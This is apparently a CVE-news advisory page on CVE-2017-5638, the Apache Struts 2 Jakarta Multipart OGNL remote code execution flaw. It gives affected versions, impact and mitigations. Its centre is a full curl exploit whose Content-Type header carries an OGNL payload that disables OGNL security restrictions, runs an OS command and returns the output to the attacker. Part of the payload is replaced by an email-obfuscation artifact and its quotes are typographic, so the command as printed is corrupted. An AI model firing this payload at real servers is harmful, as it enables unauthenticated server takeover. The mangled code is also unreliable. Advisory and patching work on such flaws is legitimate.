Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent with a file upload request, the parser incorrectly processes it, attempting to evaluate a portion of the header as an Object-Graph Navigation Language (OGNL) expression. OGNL is a powerful expression language integrated into Struts that can execute Java code and access the application’s context. An attacker can craft a Content-Type header containing a malicious OGNL expression. Because the parser fails to sanitize this input before evaluation, the embedded OGNL code is executed on the server with full application privileges. This allows the attacker to achieve unauthenticated remote code execution, granting them complete control over the vulnerable server.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch released 2017-03-07

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’whoami’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://vulnerable-target/upload.action`

How Exploit:

Craft malicious HTTP request.

Target vulnerable Struts endpoint.

OGNL expression server-side execution.

Arbitrary command execution achieved.

Protection from this CVE

Upgrade Struts immediately.

Apply official patch.

Filter malicious Content-Type headers.

Use alternative file parser.

Impact:

Full system compromise.

Data theft.

Service disruption.

Arbitrary code execution.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top